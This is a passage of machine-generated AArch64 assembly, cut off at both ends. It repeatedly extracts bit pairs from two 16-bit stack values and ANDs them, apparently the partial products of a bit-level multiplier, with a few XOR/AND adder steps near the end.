w8, [sp, #350] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1003] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #999] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1001] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #995] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #349] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #355] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #304] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #354] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #486] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #485] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #484] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #483] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1043] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #362] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #702] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #705] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #127] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #228] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #227] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #757] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #766] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #664] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1094] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1096] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1097] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1090] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1091] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1092] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #738] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #945] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #946] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #947] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #948] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #949] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #950] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #571] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #573] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #572] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #581] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #580] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #255] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #256] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #254] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #108] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #419] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #418] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #417] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #416] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #423] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #422] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #421] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #420] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #296] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #294] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #295] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #292] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #293] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #442] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #291] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #490] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #305] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #625] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #841] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #839] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #840] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #845] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #846] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #843] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #844] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #833] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #834] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #627] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #626] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #240] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1137] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1138] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1135] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1136] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1141] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1142] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1139] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1140] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1145] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1146] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #337] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #331] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #130] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #132] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #802] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #140] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #616] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #617] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #618] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #619] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #612] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #613] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #614] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #615] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #387] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1095] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #328] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #723] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #724] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #721] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #722] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #727] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #728] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #725] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #726] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #731] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #187] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1009] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1084] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1083] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1088] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #54] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #46] ldrh w8, [sp, #1246] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #391] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #393] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #394] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #395] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #396] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #382] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #383] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1086] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #732] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #832] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #372] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #364] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #758] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #26] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #31] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #32] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #29] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #30] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #35] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #700] ldrh w8, [sp, #1244] asr w8, w8, #4 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #847] ldrh w8, [sp, #1244] asr w8, w8, #6 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #824] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #4 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #823] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #6 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #848] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #7 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1093] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #273] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #272] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #275] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #274] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #270] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #269] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #271] ldrh w8, [sp, #1244] asr w8, w8, #8 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #730] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #34] ldrb w8, [sp, #823] ldrb w9, [sp, #824] and w8, w8, w9 strb w8, [sp, #9] ldrb w8, [sp, #349] ldrb w9, [sp, #350] eor w8, w8, w9 strb w8, [sp, #351] ldrb w8, [sp, #349] ldrb w9, [sp, #350] and w8, w8, w9 strb w8, [sp, #886] ldrb 